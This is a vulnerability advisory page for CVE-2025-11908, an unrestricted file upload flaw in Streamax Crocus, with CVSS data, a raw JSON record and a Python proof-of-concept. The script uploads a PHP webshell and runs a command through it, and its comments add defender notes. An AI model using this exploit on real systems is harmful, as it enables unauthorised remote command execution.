Security Vulnerability Report
CVE-2025-11908 CVSS 6.3 MEDIUM

CVE-2025-11908

Published: 2025-10-17 19:15:37
Last Modified: 2026-04-29 01:00:02

Description

A security flaw has been discovered in Shenzhen Ruiming Technology Streamax Crocus 1.3.40. The affected element is the function uploadFile of the file /FileDir.do?Action=Upload. Performing manipulation of the argument File results in unrestricted upload. The attack is possible to be carried out remotely. The exploit has been released to the public and may be exploited. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
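CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
Note: the score above is the assessment marked "Secondary" in the raw JSON record below. The same record also carries a "Primary" CVSS 3.1 assessment of 8.8 HIGH (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H), which differs only in rating the confidentiality, integrity and availability impact as High.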

Configurations (Affected Products)

cpe:2.3:a:streamax:streamax_crocus:1.3.40:*:*:*:*:*:*:* - VULNERABLE
Shenzhen Ruiming Technology Streamax Crocus 1.3.40

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
CVE-2025-11908 - Streamax Crocus 1.3.40 Unrestricted File Upload PoC
Vulnerability: Unrestricted file upload in /FileDir.do?Action=Upload
Author: Security Researcher

Flow of the script: log in, POST a multipart form whose "File" part carries
a PHP payload to the upload endpoint, then request the file back.

Review notes (what the advisory on this page does and does not support):
  * The advisory names only the endpoint /FileDir.do?Action=Upload, the
    function uploadFile and the argument File, and rates the flaw as needing
    low privileges (PR:L), i.e. an authenticated account.
  * The login URL, the form field names, the /upload/ retrieval path and the
    assumption that the server executes .php files are choices made by this
    script; the advisory text does not confirm any of them.

What a defender can take from it:
  * Log sources worth checking: authenticated POSTs to
    /FileDir.do?Action=Upload whose multipart "File" part has a
    server-executable file name, followed by GETs for that file name.
  * The advisory states the vendor did not respond, and the page references
    no fix. Interim measures are to limit who can reach the application,
    review low-privilege accounts, filter uploads by an allow-list of
    extensions in front of the application, and make sure the upload
    directory is not served with script execution enabled.
"""
import requests
import sys
from requests_toolbelt.multipart.encoder import MultipartEncoder

# Placeholder base URL; main() overwrites it with the first CLI argument.
TARGET_URL = "http://target-host"
# The endpoint named in the advisory.
UPLOAD_ENDPOINT = "/FileDir.do?Action=Upload"
# Placeholder account. The advisory's PR:L rating means some valid
# low-privilege account is a precondition.
USERNAME = "test"
PASSWORD = "test123"
# PHP payload sent as the "File" part.
# NOTE(review): the original comment called this "disguised as image file",
# but the script sends it as test.php with application/octet-stream, so
# nothing here is disguised.
# The literal is kept on one line exactly as the page shows it; any line
# breaks it originally contained are not recoverable from the page.
WEBSHELL_CONTENT = b"""<?php // Simple PHP webshell for testing purposes echo "Vulnerable: CVE-2025-11908"; if(isset($_REQUEST['cmd'])){ system($_REQUEST['cmd']); } ?>"""


def login(session, base_url):
    """Log in with USERNAME/PASSWORD so the session holds an auth cookie.

    Returns True only when the POST answers 200 and the session then holds a
    cookie named JSESSIONID; every other outcome falls through to False.

    NOTE(review): /Login.do and the field names "username"/"password" are
    this script's assumptions; the advisory text does not describe the login
    interface.
    """
    login_url = f"{base_url}/Login.do"
    data = {
        "username": USERNAME,
        "password": PASSWORD
    }
    try:
        resp = session.post(login_url, data=data, timeout=10)
        # JSESSIONID is the session cookie name used by Java servlet
        # containers.
        if resp.status_code == 200 and "JSESSIONID" in session.cookies.get_dict():
            print("[+] Login successful")
            return True
    except Exception as e:
        print(f"[-] Login failed: {e}")
    # A rejected login that raises no exception lands here without any
    # message of its own.
    return False


def upload_malicious_file(session, base_url, filename="test.php"):
    """POST WEBSHELL_CONTENT as the multipart "File" part to the endpoint.

    Returns True when the response is 200 and its body contains "success" or
    "upload" (case-insensitive); otherwise False.

    NOTE(review): that body check is loose. An error page that mentions
    "upload" also satisfies it, so True is not proof that the file was
    stored.
    """
    upload_url = f"{base_url}{UPLOAD_ENDPOINT}"
    # Multipart body: the "File" part named in the advisory, plus an
    # "Action" field that repeats the query-string value.
    multipart_data = MultipartEncoder(
        fields={
            "File": (filename, WEBSHELL_CONTENT, "application/octet-stream"),
            "Action": "Upload"
        }
    )
    headers = {
        "Content-Type": multipart_data.content_type,
        # Fixed User-Agent string; it can serve as a log indicator for this
        # exact script.
        "User-Agent": "Mozilla/5.0 (compatible; PoC)"
    }
    try:
        resp = session.post(upload_url, data=multipart_data, headers=headers, timeout=10)
        print(f"[+] Upload response status: {resp.status_code}")
        print(f"[+] Response body: {resp.text[:500]}")
        # Keyword heuristic on the response body (see the docstring caveat).
        if resp.status_code == 200 and ("success" in resp.text.lower() or "upload" in resp.text.lower()):
            print(f"[+] File uploaded successfully: {filename}")
            return True
    except Exception as e:
        print(f"[-] Upload failed: {e}")
    return False


def verify_shell(session, base_url, filename="test.php"):
    """Request the uploaded file back and, on a 200, call it with ?cmd=id.

    Returns True when the first GET answers 200, otherwise False. The result
    of the second request is printed but never checked.

    NOTE(review): the /upload/ location is this script's guess; the advisory
    text does not say where uploads are stored or whether they are
    web-reachable. A 200 by itself also does not show the payload ran,
    because the script never inspects the response body.

    NOTE(review): login() expects a JSESSIONID cookie, which points to a
    Java servlet application, yet the payload is PHP. Whether the target
    executes .php files at all is not established by the advisory text.

    Nothing in this script removes the uploaded file afterwards; it stays on
    the host until it is deleted by hand.
    """
    shell_url = f"{base_url}/upload/{filename}"
    try:
        resp = session.get(shell_url, timeout=10)
        if resp.status_code == 200:
            print(f"[+] Webshell accessible at: {shell_url}")
            # Second request passes a command through the payload's cmd
            # parameter; the output is only printed.
            cmd_resp = session.get(f"{shell_url}?cmd=id", timeout=10)
            print(f"[+] Command execution result: {cmd_resp.text}")
            return True
    except Exception as e:
        print(f"[-] Shell verification failed: {e}")
    return False


def main():
    """Run the three steps (login, upload, verify) against TARGET_URL.

    The first CLI argument, when given, replaces the module-level
    TARGET_URL. The process exits with status 1 if login() returns False.
    """
    if len(sys.argv) > 1:
        global TARGET_URL
        TARGET_URL = sys.argv[1]
    session = requests.Session()
    print(f"[*] Target: {TARGET_URL}")
    print(f"[*] Testing CVE-2025-11908 - Unrestricted File Upload")
    # Step 1: Login (the flaw is rated PR:L, so an account is required)
    if not login(session, TARGET_URL):
        print("[-] Cannot proceed without valid credentials")
        sys.exit(1)
    # Step 2: Upload the payload
    if upload_malicious_file(session, TARGET_URL):
        # Step 3: Request the uploaded file back
        verify_shell(session, TARGET_URL)
    else:
        print("[-] Exploit failed")


if __name__ == "__main__":
    main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11908", "sourceIdentifier": "[email protected]", "published": "2025-10-17T19:15:36.813", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in Shenzhen Ruiming Technology Streamax Crocus 1.3.40. The affected element is the function uploadFile of the file /FileDir.do?Action=Upload. Performing manipulation of the argument File results in unrestricted upload. The attack is possible to be carried out remotely. The exploit has been released to the public and may be exploited. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": 
"NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-434"}]}, {"source": "[email protected]", "type": "Primary", "description": 
[{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:streamax:streamax_crocus:1.3.40:*:*:*:*:*:*:*", "matchCriteriaId": "9BE97623-A1D4-407D-88A8-8E204CFC39D2"}]}]}], "references": [{"url": "https://github.com/FightingLzn9/vul/blob/main/%E6%B7%B1%E5%9C%B3%E5%B8%82%E9%94%90%E6%98%8E%E6%8A%80%E6%9C%AF%E8%82%A1%E4%BB%BD%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8Crocus%E7%B3%BB%E7%BB%9F.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.328918", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.328918", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.671391", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://github.com/FightingLzn9/vul/blob/main/%E6%B7%B1%E5%9C%B3%E5%B8%82%E9%94%90%E6%98%8E%E6%8A%80%E6%9C%AF%E8%82 ... (truncated)